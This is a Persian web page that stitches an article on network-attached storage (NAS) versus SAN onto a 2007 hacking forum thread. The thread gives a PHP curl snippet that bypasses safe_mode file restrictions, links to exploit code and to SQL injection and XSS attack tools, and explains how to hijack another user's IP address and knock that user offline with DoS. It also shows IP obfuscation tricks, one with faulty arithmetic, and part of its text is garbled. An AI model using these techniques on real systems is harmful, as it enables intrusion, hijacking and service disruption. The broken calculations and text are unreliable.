امروزه این شیوه مقدماتی ذخیره‌سازی و پردازش، كمتر مورد استفاده قرار می‌گیرد و شركت‌ها مجبورند برای ذخیره‌سازی حجم عظیم اطلاعاتی كه در سیستم‌هایی چون MIS ، ERP یا data warehousing تولید و جابه‌جا می‌شوند روش‌های تازه‌تری را برگزینند. خوشبختانه، به خاطر وجود اینترنت، جریان عظیم اطلاعات نه تنها ادامه دارد، بلكه شدیدتر از گذشته شده است. امروزه تولید، انتقال، ذخیره‌سازی و تحویل اطلاعات به هر كجا و در هر كجای جهان در عرض چند ثانیه صورت می‌گیرد و وابستگی مردم به اطلاعات بیشتر شده است به طوری كه برای مشتریان یك شركت (چه داخلی و چه خارجی) یافتن اطلاعاتِ مربوط به شركت با سرعت پایین تحمل‌پذیر نیست.
شركت‌هایی كه هنوز سرویس‌های اطلاع‌رسانی اینترنتی خود را راه‌اندازی نكرده‌اند، خلاء آن را به خوبی احساس می‌كنند. همین موضوع شركت‌های نرم‌افزاری و مراكز خدمات‌رسانی اینترنت (و به ویژه سازمان‌های دات كام) را نیز به تكاپو واداشته تا راه‌حل‌های قابل بسط و مطمئن‌تری را ارائه دهند. به طور كلی، شركت‌های تجاری ضرورت داشتن یك انباره ذخیره‌سازی مطمئن را برای نگهداری و ارائه اطلاعات احساس می‌كنند، اما در عین حال دوست ندارند برای این منظور مجبور به استخدام كارشناسان IT بشوند، كه هم كمیاب هستند و هم حقوق بالایی دارند. برای این شركت‌ها شاید بهترین راه‌حل استفاده از Network-Attached Storage یا همان NAS باشد، كه موضوع مقاله ما است.
NAS چیست؟
انباره (Storage) ذخیره‌سازی متصل به شبكه (NAS) دستگاهی است كه به صورت اشتراكی در شبكه مورد استفاده قرار می‌گیرد. این دستگاه، با استفاده از NFS (سیستم فایلی شبكه‌ای مختص محیط‌های یونیكسی)، CIFS (سیستم فایلی شبكه‌ای مختص محیط‌های ویندوزی)،FTP ،HTTP و سایر پروتكل‌ها با اجزای شبكه ارتباط برقرار می‌كند. وجود NAS در یك شبكه برای كاربران آن شبكه افزایش كارایی و استقلال از سكو را به ارمغان می‌آورد، گویی كه این انباره مستقیماً به كامپیوتر خودشان متصل است.
خود دستگاه NAS یك وسیله پرسرعت، كارآمد، تك‌منظوره و اختصاصی است كه در قالب یك ماشین یا جعبه عرضه می‌شود. این دستگاه طوری طراحی شده كه به تنهایی كار كند و نیازهای خاص ذخیره‌سازی سازمان را با استفاده از سیستم عامل و سخت‌افزار و نرم‌افزار خود در بهترین حالت برآورده سازد. NAS را می‌توان مثل یك
دستگاه plug-and-play در نظر گرفت كه وظیفه آن تأمین نیازمندی‌های ذخیره‌سازی است. این سیستم‌ها با هدف پاسخگویی به نیازهای خاص در كوتاه‌ترین زمان ممكن (به صورت بلادرنگ) طراحی شده‌اند. ماشین NAS برای به كارگیری در شبكه‌هایی مناسب‌تر است كه انواع مختلف سرور و كلاینت در آنها وجود دارند و وظایفی چون پراكسی، فایروال، رسانه جریانی و از این قبیل را انجام می‌دهند.
در این مقاله به معرفی دسته‌ای از دستگاه‌های NAS می‌پردازیم به نام <فایلر> كه امكان به اشتراك گذاشتن فایل‌ها و داده‌ها را میان انواع متفاوت كلاینت‌ها فراهم می‌سازند. در عین حال، مزایای NAS در مقایسه با SAN (شبكه‌های موسوم به Storage Area Network) مورد بررسی قرار خواهد گرفت.
Filer چیست؟
دستگاه‌های NAS موسوم به فایلر تمام توان پردازشی خود را صرفاً روی خدمات فایلی و ذخیره‌سازی فایل متمركز می‌كنند. (http://www.academist.ir/) در واقع فایلر به عنوان یك وسیله ذخیره‌سازی، نقش یك فایل سرور اختصاصی را ایفا می‌كند. فایلر مستقیماً به شبكه (معمولاً LAN) متصل می‌شود تا دسترسی به داده‌ها را در سطح فایل فراهم سازد. نصب، راه‌اندازی و مدیریت آسان فایلر، و همچنین مستقل از سكو بودن آن، باعث شده تا هزینه‌های مدیریتی كاهش چشمگیری پیدا كنند.
فایلرهای NAS می‌توانند در هر جایی از شبكه مستقر شوند، بنابراین مدیر شبكه آزادی كامل دارد كه آنها را در نزدیكی محلی قرار دهد كه نیاز به خدمات ذخیره‌سازی دارد. یكی از فواید اصلی استفاده از فایلر آزاد شدن سرورهای همه منظوره و گران قیمت سازمان از انجام عملیات مدیریت فایل است. سرورهای همه منظوره غالباً درگیر عملیاتی می‌شوند كه CPU را زیاد به كار می‌كشند و بنابراین نمی‌توانند به خوبیِ فایلر از عهده عملیات مدیریت فایل برآیند.
تحلیلگران پیش‌بینی می‌كنند نیازِ به ظرفیت ذخیره‌سازی طی سال آینده ده برابر نسبت به گذشته افزایش پیدا كند و به همین دلیل به مدیران IT استفاده از NAS را توصیه می‌كنند. برای هر سازمانی كه در حال استفاده از فایل سرور‌های همه منظوره هستند (یا قصد استفاده از آنها را دارند) بهترین راه‌حل این است كه سیستم‌های NAS را جایگزین سرورهای خود بكنند.
NAS در مقابل SAN
NAS سرنام عبارت NetworkAttached Storage است در حالی كه SAN مخفف Storage Area Network می‌باشد. این دو تكنولوژی شباهت‌های بسیاری به یكدیگر دارند، مثلاً این كه هر دو بهترین حالت یكپارچگی (consolidation) را تأمین می‌كنند، هر دو به محل ذخیره‌سازی داده‌ها مركزیت می‌بخشند، و هر دو دسترسی به فایل را در كارآمدترین حالت فراهم می‌سازند. قابلیت به اشتراك گذاشتن انباره ذخیره‌سازی میان چند میزبان، حمایت از سیستم عامل‌های مختلف، و تفكیك محل ذخیره‌سازی از محل اجرای برنامه‌ها از دیگر مشتركات این دو تكنولوژی است. علاوه بر این، هر دو آن‌ها می‌توانند با استفاده از RAID و اجزای یدكی، آمادگی و یكپارچگی داده‌ها را تضمین كنند.
اما تفاوت این دو تكنولوژی اصولاً در نحوه اتصال آنها به شبكه است. NAS محصولی مشخص و شناخته شده است كه بین application server و file system می‌نشیند (شكل ۱)، در حالی كه SAN یك معماری است كه بر روی سیستم فایلی و ابزارهای فیزیكی ذخیره‌سازی اعمال می‌شود. (شكل۲ ) SAN در واقع خودش یك شبكه است، شبكه‌ای كه تمام مخازن ذخیره‌سازی و سرورها را به هم متصل می‌كند. بنابراین، هر یك از این دو فناوری، برای تأمین نیازهای ذخیره‌سازی بخش‌های متفاوت از یك سازمان مورد استفاده قرار می‌گیرد.
NAS برای كاربران شبكه
NAS یك وسیله شبكه‌ محور است و عموماً به خاطر یكسان‌سازی محل ذخیره‌سازی داده‌های كاربران در
شبكه LAN مورد استفاده قرار می‌گیرد. NAS یك راه‌حل مناسب ذخیره‌سازی است كه دسترسی سریع و مستقیم كاربران به سیستم فایلی را فراهم می‌سازد. استفاده از NAS مشكل معطلی‌هایی را بر طرف می‌سازد كه غالباً كاربران برای دسترسی به فایل‌های موجود در سرورهای همه منظوره با آن مواجه هستند.
NAS ضمن تأمین امنیت لازم، تمام خدمات فایلی و ذخیره‌سازی را از طریق پروتكل‌های استاندارد شبكه‌ای فراهم می‌سازد: TCP/IP برای انتقال داده‌ها، Ethernet و Giga Ethernet برای دسترسی میانی، و CIFS ،http، و NFS برای دسترسی به فایل از راه دور. علاوه بر این، با NAS می‌توان به طور همزمان به كاربران یونیكس و ویندوز سرویس داد و اطلاعات را بین معماری‌های متفاوت به اشتراك گذاشت. از نظر كاربران شبكه، NAS وسیله‌ای است كه دسترسی به فایل را بدون مزاحمت و ایجاد اختلال برای آن‌ها مهیا می‌سازد.
اگر چه NAS تا حدودی كارایی را فدای مدیریت‌پذیری و سادگی می‌كند، اما به هیچ وجه نمی‌توان آن را یك فناوری كه در ذات خود تأخیر دارد، پنداشت. NAS به كمك گیگابیت اترنت به كارایی بالا و تأخیر كوتاه دست یافته و هزاران كاربران را از طریق فقط یك اینترفیس سرویس می‌دهد. بسیاری از سیستم‌های NAS دارای چند اینترفیس هستند و می‌توانند همزمان به چند شبكه متصل شوند. با رشد شبكه و نیاز بیشتر به سرعت بالا، NAS بهترین انتخاب برای پاسخ‌گویی به برنامه‌هایی خواهد شد كه به كارایی بالایی احتیاج دارند.
SAN برای اتاق سرورها
SAN دیتا محور است. شبكه‌ای است كه برای ذخیره‌سازی داده‌ها اختصاص داده شده است. SAN برخلاف NAS، جدای از LAN مرسوم است. بنابراین، SAN می‌تواند از ایجاد ترافیك‌های استاندارد شبكه، به عنوان یك عامل بازدارنده سرعت، جلوگیری كند. SANهای مبتنی برFiber Channel، با بهره‌گیری از مزایایی كانال‌های I/O در یك شبكه اختصاصی جداگانه، سرعت را بهتر و تأخیر را كمتر می‌كنند.
SAN با استفاده از روتر، سوییچ و gateway، انتقال داده‌ها بین محیط‌های ناهمگن ذخیره‌سازی و سروری را سهولت می‌بخشد. از (http://www.academist.ir/) همین رو، ایجاد یك شبكه ذخیره‌سازی نسبتاً دور (در حد ۱۰ كیلومتر) با SAN امكان‌پذیر است.
معماری SAN برای انتقال داده‌های بلوكی در بهترین حالت است. در اتاق كامپیوترها، SAN غالباً بهترین انتخاب برای بررسی مسائل پهنای باند، دسترسی به داده‌ها، و یكپارچه‌سازی است.
با توجه به تفاوت‌های بنیادینی كه بین تكنولوژی و اهداف SAN و NAS وجود دارد، برای انتخاب هر یك باید تصمیم اساسی گرفته شود. هر یك از این دو را می‌توان برای رفع نیازهای ذخیره‌سازی مورد استفاده قرار داد. البته در آینده ممكن است مرز بین دو تكنولوژی آن چنان روشن نباشد و در یك مجموعه از هر دو روش استفاده شود.
راه‌حل‌های NAS برای نیازهای امروز شركت‌ها
نیازهای شركت‌های ISP ،ASP و دات‌كام به سیستم‌های قابل اطمینان، كم‌هزینه، و قابل نصب در رك به گسترش راه‌حل‌های NAS كمك خواهد كرد. كاهش هزینه‌های كادر IT شركت‌ها نیز از دیگر دلایل مقبولیت این راه‌حل‌ها خواهد بود. از دید كاربر، این كه دسترسی به انبوه اطلاعات به صورت بلادرنگ امكان‌پذیر است، چیز خوشایندی است، و در سمت مدیریت، عدم نیاز به نیروی متخصص IT. مدیریت NAS از طریق یك رابط گرافیكی در مرورگر وب امكان‌پذیر است.
از آن‌جا كه فایلر NAS از قبل برای تأمین نیازهای ذخیره‌سازی تنظیم شده است، اداره آن كار ساده‌ای است، و همین امر موجب كاهش خطاهایی می‌شود كه هنگام دستكاری و تنظیم سیستم‌ها پیش می‌آیند. به علاوه، از آنجا كه با NAS ظرفیت بیشتری را (نسبت به سرورهای همه منظوره) به ازاء هر مدیر می‌توان اداره كرد، هزینه كل مالكیت (TCO) نیز كاهش می‌یابد.
توسعه سریع، بدون توقف سرویس
شركت‌های دات‌كام و سایر شركت‌های رو به رشد، همواره در تلاشند تا زیرساخت‌های IT خود را با فعالیت‌های پویای كسب و كار خود همگام نگه دارند. اتكا به سرور یا سرورهای عمومی در بعضی فعالیت‌های شركت، شاید ضروری باشد، اما نباید این سرورها را با نیازهای رو به افزون ذخیره‌سازی تحت فشار گذاشت. با اضافه كردن ظرفیت ذخیره‌سازی در سرورهای عمومی، قطعاً با توقف سرویس (downtime) مواجه خواهید شد. وقتی سیستمی را خاموش می‌كنید تا ظرفیت ذخیره‌سازی آن را افزایش دهید، برنامه‌های كاربردی شما از كار می‌افتند و این یعنی كاهش بهره‌وری.
از سوی دیگر، افزایش ظرفیت ذخیره‌سازی با NAS نه تنها ساده است، بلكه بدون ایجاد اختلال در شبكه انجام می‌شود. طی ۱۵ دقیقه می‌توانید یك فایلر جدید به مجموعه اضافه كنید بدون این كه مزاحم كار دیگران بشوید. بیشتر سیستم‌های پیشرفته NAS می‌توانند <درجا> ظرفیت ذخیره‌سازی را افزایش دهند و نیازی به اضافه كردن node جدید به شبكه ندارند. این بدان معنی است كه كاربران به محض نیاز به ظرفیت ذخیره‌سازی بیشتر، به آن دست خواهند یافت.
رها شدن سرور
با استفاده از فایلر NAS، سرورهای شما از انجام عملیات پرمصرف و زمان‌بر فایلینیگ خلاص شده و بدین ترتیب، می‌توانند با توان بیشتر به پردازش داده‌ها بپردازند. اگر سرور عمومی خود را برای انجام عملیات فایلینگ (علاوه بر اعمال دیگر) اختصاص داده باشید، خواهید دید كه فشار زیادی روی آن وارد می‌آید، به طوری كه عملاً از انجام سایر وظایف خود (مثل ارسال و دریافت email یا اداره برنامه‌ها) باز می‌ماند.
اشتراك داده‌ها و اتصال Multi-OS
شركت‌های رو به توسعه یا شركت‌هایی كه در پی ادغام با شركت‌های دیگر هستند، بدون شك با وضعیت ناهمگن بودن محیط‌ها و سیستم عامل‌ها مواجه خواهند شد. در چنین شرایطی، سیستم NAS می‌تواند پاسخگوی این چالش باشد، چرا كه توانایی كار با دو سیستم اصلی NFS و CIFS را دارد. یكی از توانایی‌های غیر قابل
انكار NAS حمایت آن از این پروتكل‌ها و قابلیت به اشتراك‌گذاری داده‌ها بین سكوهای مختلف است. با توجه به این كه روز به روز استفاده شركت‌ها از فایل‌های حجیم در برنامه‌ها (نظیر فایل‌های صوتی-تصویری) بیشتر می‌شود، این ویژگی NAS اهمیت فوق‌العاده‌ای دارد.
بهبود زیرساخت‌های موجود
با افزودن NAS به شبكه، دانش و مهارت مدیریتی خود را بالاتر برده و به ارتقا شبكه كمك می‌كنید. به كار بستن NAS در هر كجا از شبكه كه نیاز آن احساس می‌شود امكان‌پذیر است. NAS را می‌توان با ابزارهای مدیریتی بزرگ‌تری چون Microsoft Management Consol ،Tivoli و HP OpenView نیز تلفیق كرد. و دیگر این كه NAS نیازی به مجوزهای پرهزینه سیستم عامل شبكه (NOS) ندارد.

pastoo
07-03-2007, 23:17
منتشر شده توسط itsrg (http://itsrg.com/security/userinfo.php?uid=1) , تاريخ انتشار Feb-06-2007

با نام او .
مراحل راه اندازی اولیه :
1- ابتدا packege را از حالت فشرده خارج کرده .
2- بر روی فایل : webgoat.bat کلیک مینمایید .
3- سپس با توجه به تغییراتی که در سیستم شما وجود داشته ، بر روی یکی از دو آدرس زیر میتوانید خالت GUI را مشاهده کنید :

http://localhost/WebGoat/attack (http://localhost/WebGoat/attack)
با
http://localhost:8080/WebGoat/attack (http://localhost:8080/WebGoat/attack)

4- اگه همه چیز موفقیت آمیز بوده باشد ، پنجره ای باز شده و از شما user&pass میخواهد که میتوانید مقدار :

user:guest
pass:guest
را وارد کنید .

5- گزینه start را مشاهده میکنید (شکل شماره 1)
6-نام خود را وارد کنید و شروع به تست حملات کنید (شکل 2)

سربلند باشید.

http://itsrg.com/security/images/library/article/webgoast11.jpg
http://itsrg.com/security/images/library/article/webgoast1.jpg

pastoo
12-03-2007, 18:07
به نظرم بحث در اين مورد ( مشکلات امنيتي مفسر زبان PHP ) که هر روز دارد بيشتر مي شود ، لازم به نظر ميرسد .
اين اولين بار است که يک زبان برنامه نويسي به اين شدت مورد حمله قرار ميگيرد ... چرا چنين رخ ميدهد ؟

باگهاي موجود را ميتوان به 3 دسته تقسيم کرد :
اما در همه آنها آنچه مشترک است : اين است که تزريق کدها و shell code ها از طريق برخي از فرامين صورت ميگيرد ، به اين مثل توجه کنيد :
زبان PHP مثل يادگيري زبان چيني قديم است ، آسان ولي سخت !!
نگاه کنيد php زباني ماژولار است ، يعني براي هر بخش و هر قسمت و هر چيزي ما يک دستور داريم ، همانند زبان چيني که براي بيان کلمه اي همانند "درخت" شکل آن به کار ميرود ، PHP براي هر چيزي که لازم داريد (واقعا هر چيز !) به شما يک دستور اختصاص ميدهد ، و اين يعني مشلات شروع ميشود .


1- ضعيف : باگهايي که در آنها اجراي دستورات xss اجازه داده ميشود ، مثلا در تابعي که بايد جلوي اجراي HTML را بگيرد ، به گونه اي دستورات تزريق شوند که HTML اجرا شود !
به عنوان مثال :
http://milw0rm.com/exploits/3405 (http://milw0rm.com/exploits/3405)

2- متوسط : باگهايي که باعث ميشوند ، Buffer Over flow رخ دهد و چون مفسر php در سطح root نصب ميگردد ، مجوز روت را با يک حمله BOF ميتوان گرفت .
اين حملات معمولا زياد مورد توجه واقع نميشوند ، چون در سيستم هاي unix اي مثل freebsd و يا fedora روش هايي براي جلوگيري از سرريز بافر وجود دارد که خدا رو شکر معمولا تمامي اين حملات در چنين سرور هايي منتفي هستند (مثلا سرور هاي centos مزخرفترينند در اين موارد !)
به عنوان مثال :
http://milw0rm.com/exploits/3440 (http://milw0rm.com/exploits/3440)
http://milw0rm.com/exploits/3442 (http://milw0rm.com/exploits/3442)
http://milw0rm.com/exploits/3431 (http://milw0rm.com/exploits/3431)

3- خطرناک : شايد ايده اصلي به در بخور بودن باگها در اين يک کامپايلر ، دور زدن تمهيدات امنيتي همانند dir Access ها و perimission هاي مربوط به user ها و safe mode است .
اين باگها در دستوراتي کشف ميشوند که معمولا براي انجام کاري بر روي Object ها و يا فراخواني فايل ها و کلا process ها هستند ، اگر به روشي بتوان دستور داد که فايل ديگري غير از فايل ها و process هاي دستر رسي داده شده را اجرا کند ، آنگاه ما با يک php privilege دست يافته ايم !

نمونه هايي :
http://securityreason.com/achievement_securityalert/37 (http://securityreason.com/achievement_securityalert/37)
, .,...

خوب چرا چنين ميشود ؟

اين مورد را شايد بابررسي سورس هاي خود زبان php شايد بتوان مورد بررسي قرار داد ، مشکل اين است که php هم مانند Internet Explore داراي يک موتور است !!!!

اين به چه معني است ؟

در اين زمان بايد به جمله بالا دقت کافي را داشت و آن هم اينکه ، PHP از دو جهت آسيب پذير است يعني :

1- ورود و خروج فرامين :
هنگامي که فرمان :
كد:echo " for test"; // for test

صادر ميشود زبان مفسر ابتدا وارد آناليز رشته اصلي ميشود و سپس آن را از لايه دوم موتور خود (يک موتور 3 لايه فرض کنيد که لايه 3 اجراي فرامين سطوح بالاتر را فراخواني ميکند ) عبور ميدهد .
حال دستور را به جاي " با ' آغاز کنيد :
كد:
echo 'ok'; //for test
php با ديدن ' متوجه اجرا نشدن پارامتر ها و آرگامون هاي تعريف شده ميکند يعني اگر شما در خط بالايي تعريف کنيد : Test$=11 و آن را در تابع echo با ' فراخاني کنيد در صورتي که به صورت ساده test$ به کار برريد ، آن را يک تابع فرض نميکند ، يعني تا وقتي که از / در قبل از آن استفاده نکنيد php اين دستور را در لايه هاي دوم خود نميبرد ، در همان لايه اول اجرا ميکند ....

مفاهين اين موضوع کمي پيچيده تر اين مثال است ، حال خود فکر کنيد که دستوري همانند echo که فقط اجازه دسترسي تا لايه 2 را دارد ، تا لايه 3 نفوذ کنيد ، آن وقت ميتواند دستورات لايه 3 را در لايه 1 و 2 اجرا کند ، به همي جالبي و راحتي :
همانند باگ معروف :
http://www.securiteam.com/unixfocus/5MP0N2KIKQ.html (http://www.securiteam.com/unixfocus/5MP0N2KIKQ.html)
که در انجمن هاي سيمرغ هم به آن پرداخته شده است :
http://forums.simorgh-ev.com/viewtopic.php?t=377&highlight=curl (http://forums.simorgh-ev.com/viewtopic.php?t=377&highlight=curl)

در اينجا : curl همان حرف هاي بالا را انجام ميدهد :
كد:<?
$ch = curl_init("file://filethatyoudonthaveaccessto.php\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>

خوب مشکل بعدي کجا ايجاد ميشود ؟

2- موتوري که Patch ميشود :
ميدانيد اين حرف يعني چه ؟ شما اگر باگهاي سالهاي 2004 براي IE و بعد از آن را داشته باشيد ميتوانيد در فايل هاي CHM (که فقط از موتور IE استفاده ميکنند ، دوباره زنده کنيد : حتي باگهاي قديمي تر را ) يعني CHM ها ميتوانند هرف هاي بعدي باشند (همان طور که قبلا بارها سوء استفاهده هايي از آنها ديده ايم و باز هم ميبينيم )
حال PHP همانند IE فقط موتور هاي شماره 2و1 خود را Update ميکند ، يعني موتور اصلي هنوز مشکل دارد ، ممکن است باگهاي قديمي هم باز تکرار شوند ..
به همين دليل PHP اعلام کرده از PHP 6 به بعد موتور خود را کاملا تغيير ميدهد و از safe mode هم خبري نيست ، يعني موتورهاي هر کدام در يک سطح کاربري خاص اجرا ميشوند و با تمهيداتي عجيب ...

در مورد باگها PHP به انجمن هاي :
http://forum.hardened-php.net (http://forum.hardened-php.net/)
مراجعه کنيد .
سايت زير هم مطالب عجيب و جالبي دارد :
http://blog.php-security.org (http://blog.php-security.org/)
http://php-security.org (http://php-security.org/)

pastoo
16-03-2007, 12:13
این فیلم انتقال شل بین دو سیستم عامل ( لینوکس به لینوکس ) هست .. بقیه مشابه همین .
برای مواقعی هست که آی.پی شما اینولید و سرور اجازه ی بایند کردم پورت رو نمیده ...

http://prophes-thrax.persiangig.com/Clips/LinuxToLinux0001.rar (http://prophes-thrax.persiangig.com/Clips/LinuxToLinux0001.rar)</SPAN>

pastoo
23-04-2007, 08:50
به نام خدا و با سلام :
بهتر ديدم يك جمع بندي از آنچه تا به الان معرفي شده و به صورت منظم تر با يك توضيح كوچك بيان كنم :

1- سايت milworm :
درجه فيلم ها : متوسط و حرفه اي
سايت معروفي كه گردانندگان آن همراه سعي در ارائه آخرين مشكلات امنيتي (به صورت كدهاي مخرب) داشته اند .
http://www.milw0rm.com/video (http://www.milw0rm.com/video)

2- سايت : onsmart
درجه فيلمها : مبتدي
معرفي ابزار هاي مديريت وب و به طور كلي جنبه آموزشي بيشتري دارد .

http://www.onsmart.net/tutorials/index.htm (http://www.onsmart.net/tutorials/index.htm)

3- سايت تيم :biyosecurity
درجه فيلم ها : متوسط / نيمه حرفه اي
http://www.biyosecurity.be/video.html (http://www.biyosecurity.be/video.html)

4-سايت irongeek :
درجه فيلم ها : متوسط / حرفه اي
http://www.irongeek.com/i.php?page=security/hackingillustrated (http://www.irongeek.com/i.php?page=security/hackingillustrated)

5- سايت آموزشي :packetattack
درجه فيلم ها : متوسط و در مباحث شبكه تا حدودي حرفه اي
http://www.packetattack.com/tutorials.html (http://www.packetattack.com/tutorials.html)

6- سايت Antichat
درجه فيلم ها : متوسط / نيمه حرفه اي
موضوع : بيشتر xss , css , sql injection , Coockie injection
http://video.antichat.org (http://video.antichat.org/)
http://video.antichat.org (http://video.antichat.org)</SPAN>

شاید کسانی باشند که نتونند فیلم ها رو online ببیند
می تونید فیلم ها ی milw0rm رو از اینجا دانلود کنید .
http://str0ke213.tradebit.com/files.php/8 (http://str0ke213.tradebit.com/files.php/8)</SPAN>

pastoo
23-04-2007, 08:58
ویرایش دوم از برنامه google hack که با آرشیو دستورات اساسی این موضوع میپردازد رو اینجا قرار میدم .

جالبه . خیلی جاها هم روش هاش به کار میاد .</SPAN>


http://forums.simorgh-ev.com/files/gh2_279.png



موفق باشید

pastoo
25-04-2007, 13:32
با تشکر از حسین عسگری عزیز به خاطر این جمع آوری بسیار کاربردی

با نام حق :
با امید به خدا و جمع آوری سری دوم ابزار ها و مقالات بسیار مفید و کاربردی حملات Sql که بر روی دیتابیس های MSSQL , MYSQL , ORACEL قابل انجام است ، تلاشی را برای یادگیری اینگونه حملات آغاز نمودیم .

اين سري مقالات را ميتوان به دو قسمت :
1- سري 6 درسي sql injection از سايت شبگرد
2- سري پيشرفته مقاله 137 صفحه اي Wolf از گروه Crouz
3- سري ابزار هاي حمله به Sql Server و حملات Sql Injection
4- مثالهای XSS و SQL INjection
5- تگ های کاربردی حملات CSS

ميباشد .
ليست ابزار ها عبارتند از :
mysqlexec.exe
mysql_pwd_crack
sqlbftools.zip
sqldict.exe
SqlExec.exe
sqlinjector
sqlinjector.zip
xss-hex-engin.htm

لیست فیلم ها :
یک فیلم از یک مثال واقعی بر روی دیتابیس mysql .


دانلود (http://www.simorgh-ev.com/security/modules/mysections/cache/files/Sql+xss+css.zip)

f7love
02-05-2007, 18:41
به کارت ادامه بده
واقعا عالیه...

pastoo
04-05-2007, 13:34
غيير IP و حفظ خود از حملات DoS و DDoS (Changing IP and Protecting from DoS and DDoS attacks):
سلام به همه، براي تغيير IP روش ها و نرم افزارها مختلفي وجود دارد ولي من مي خوام يكي از آسون ترين روش ها رو بگم:

A: اطلاعات مورد نياز (Needed Information)
1. قبل از هر چيز بايد يك مختصر توضيح در مورد Range IP بدونيد. هر ISP داراي يك Range IP مي باشد (بنابرنوع ISP تعداد IP مي تواند بيشتر هم باشه - برميگرده به بحث همون كلاسهاي IP). هر موقع كه شما به اينترنت Connect ميشويد ISP شما به طور تصادفي يك IP به PC شما مي دهد (اين مطلب در مورد Dial-Up Users صدق مي كنه). مثل اين IP:
213.217.219.169
البته بايد بدانيد كه در هر Range IP فقط رقم آخر (8 بيت آخر) IP تغيير مي كنه. مثلا اگر PC ديگري بخواهد به اينترنت با همان ISP وصل شود، IP آن كامپيوتر بين دو IP زير خواهد بود:
213.217.219.1 < 213.217.219.xxx <213> Control Panel > Network Connection
خوب حالا Connection مورد نظر خودتون رو انتخاب كنيد. روي آن Right-Click كنيد و قسمت "Properties" را انتخاب كنيد. حالا برگه (tab)، "Networking" را انتخاب كنيد و روي پروتكل "Internet protocol (TCP/IP)" دوبار كليك كنيد و برگه "General" را انتخاب كنيد. حال قسمت "Use the following IP Address" را فعال كنيد. در IP Address، يك Dead IP بنويسيد. مثل:
0.0.0.1-254
يا يك چيزي شبيه به آن.
حال در قسمت "Use the Following DNS sever" دو IP مربوط به DNS كه به دست آورديد رو وارد كنيد. اين براي ويندوز XP بود. اگه از ويندوز 2000 يا ويندوزهاي ديگر استفاده مي كنيد، بايد IP هاي مربوط به Gateway و Subnet Mask رو هم وارد كنيد كه از "ipconfig/all" به دست آورديد.

سوال: حالا براي خودم اين سوال پيش اومده و اون اينكه اگر من IP خودمو به يك Dead IP كه از Range IP خودم هست تغيير بدم و بعد 1 يا 2 ساعت يا هر چند ساعت، ISP به يك PC ديگر آن IP را بدهد، اون وقت چي ميشه؟
مثلا IP خودم، 213.213.213.213 هست و dead ip هم باشه 213.213.213.212. حالا اگر ISP اين IP رو به يك PC ديگر بده من DC ميشم يا هيچ اتفاقي نمي افته؟

D: IP Steal from WebServer:
دوستان از همين روش مي شود IP دزدي هم كرد. اگه شما كسي رو روي Range IP خودتون مي شناسيد كه يك Web Server باز كرده و قبلا اعصابتون رو خورد كرده يا شما فقط مي خواهيد يه مقدار شلوغ بازي دربياريد، ميتوانيد IP اون رو بدزديد.
به اين ترتيب هر DNS كه به اون IP بره به جاي سايت اون، سايت شما رو نشون ميده. چون شما خودتون يه Web Server باز خواهيد كرد!!
دزديدن يك IP اساسا استفاده از همون روش تغيير آدرس IP بالا و انتخاب يك IP هست كه يكي كه يه Web Server باز كرده، داره استفاده مي كنه. اغلب شما مي توانيد آن IP رو حداقل براي مدتي نگه داريد، در بقيه موارد شما نمي توانيد از آن استفاده كنيد. بنابراين به تلاش خودتون ادامه بديد تا كار كنه. شما نياز داريد خودتون يك Web Server روي پورت مشابه اون داشته باشيد. شما مي توانيد اين كار رو با سرويس هاي ديگر هم انجام بديد. همچنين شما مي توانيد اون IP كه تلاش مي كنيد بدزدين DoS يا DDoS كنيد تا از شبكه شوتش كنيد بيرون! ولي من اين كار رو توصيه نمي كنم، چون تقريبا غير قانونيه!

روش هايي براي تغيير IP:
با اين روش ها مي توانيد ظاهر IP خودتون را به اعداد ديگر يا اعداد همراه حروف لاتين تغيير بديد (!!!)

برنامه مورد نياز:
Calculator:
Start > Programs > Accessories > Calculator

A: Oct IP (Octet IP- IP هشتايي):
Example: 0330.0163.0154.0365
IP استفاده شده در اين مثال مربوط به سايت yahoo.com است (66.218.71.90)
برنامه ماشين حساب را اجرا كرده و از منوي View، قسمت Scientific را انتخاب كنيد. Dec را انتخاب و قسمت اول IP (66) را وارد كنيد. سپس روي Oct كليك كنيد. مي بينيد كه عدد 66 به 102 تغيير يافت. براي بقيه قسمت هاي IP نيز اين كار رو بكنيد:
66 =102
218 =332
71 =107
90 =132
حال اگر در Browser خودهر يك از لينك هاي زير را وارد كنيد، وارد سايت ياهو مي شويد:
http://www.yahoo.com/
http://66.218.71.90/
http://0102.0332.0107.0132/
http://000102.000332.000107.000132/
روش ديگر: IP در اصل يك عدد 4 رقمي در مبناي 256 هست كه ارقامش رو با نقطه از هم جدا كرده ايم. مثل زير:
A.B.C.D

حال اگر اين عدد كه در مبناي 256 هست رو به مبناي 10 ببريم باز هم كار IP رو مي كنه. يعني مي توانيد از يك عدد ساده هفت يا هشت رقمي به جاي IP استفاده كنيد. اگر كسي خواست اين كلك را به شما بزنه، چه كار مي كنيد؟ خوب ساده است! عدد رو از مبناي 10 به مبناي 256 ببرين تا IP به دست بياد. مثلا اين IP به مبناي 10 تبديل شده:
IP : 213.217.29.54
Base10 : 3587775798
براي تبديل IP به مبناي 10 و تبديل مبناي 10 به IP دو برنامه وجود داره كه اگر خواستيد لينك مي دم (ولي با ماشين حساب هم ميشه ديگه گير نديد زياد).

B: Dec IP:
برنامه ماشين حساب را اجرا كرده و آن را در حالت علمي قرار دهيد. حال قسمت Dec را انتخاب كرده و قسمت اوليه IP (66) را وارد كنيد. سپس اعداد فوق را در 16777216 ضرب كنيد. جواب به صورت 1107296256 مي شود.
اين اعداد را يادداشت كنيد براي بقيه قسمت ها هم به صورت فوق عملكنيد.

(First Part) 66 * 16777216 = 1107296256
(Sec Part) 218 * 65536 = 65754
(Third Part) 71 * 256 = 18176
(Fourth Part) 90 * 1 = 90


حال اين اعداد را با هم جمع كنيد:
1107296256 + 65754 + 18176 + 90 = 1107380276
عدد حاصله IP در مبناي Decimal هست. حال اگر شما روي هر يك از لينك هاي زير كليك كنيد. وارد سايت ياهو مي شويد:
http://www.yahoo.com/
http://66.218.71.90/
http://1107380276/

C: Hex IP:

Example: http://0x42.0xda.0x47.0x5a/ or http://0x42da475a/

اين مدل از IP خيلي جالب هست. برنامه ماشين حساب را اجرا كرده و آنرا در حالت علمي قرار دهيد. Dec را انتخاب و قسمت اوليه IP (66) را وارد كنيد سپس روي Hex كليك كنيد (عدد به 42 تبديل مي شود). براي بقيه قسمت هاي IP نيز روش فوق را انجام دهيد:
66 = 42
218 = DA
71 = 47
90 = 5A

عدد حاصله را به ترتيب زير مرتب كنيد:
42DA475A

